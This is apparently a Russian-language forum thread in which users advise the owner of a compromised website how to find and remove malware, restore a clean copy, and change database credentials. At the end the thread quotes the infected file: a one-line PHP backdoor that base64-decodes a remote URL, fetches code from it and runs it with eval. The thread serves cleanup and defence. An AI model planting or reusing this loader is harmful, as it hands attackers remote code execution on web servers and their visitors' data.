Вот содержание файла с которого все началось:
если вредоносный код в таком явном виде присутствует скачайте сайт на компьютер и выполните поиск фрагмента кода по файлам сайта.
как вариант полностью очистите папку с сайтом залейте чистый архив с сайтом, в конфиге поправьте связь с базой данных, потом закачайте в соответствующие папки файлы типа фотографии, аватары, скриншоты видео.
Каталоги с файлами которые будете заливать сначала проверить на присутствие в них посторонних файлов, например в папке с фотографиями какой нибудь скрипт лежит, и можно проверить антивирусом, по идее вредонос может маскироваться и под файл изображения.
А пароль от базы данных меняли? может в БД что нибудь хранится что открывает дверь.
Возможно ваша ситуация не связана с тем, что вы описали
залил в корень сайта файлик
и вас ломают через ваш зараженный компьютер? Крякнутый тотал коммандер используете?
Можете попробовать просканировать сайт этим yandex.ru/promo/manul/
<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL3Byb2dvbi5zaXRlL3dvcmsudHh0');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($b);eval($d); ?>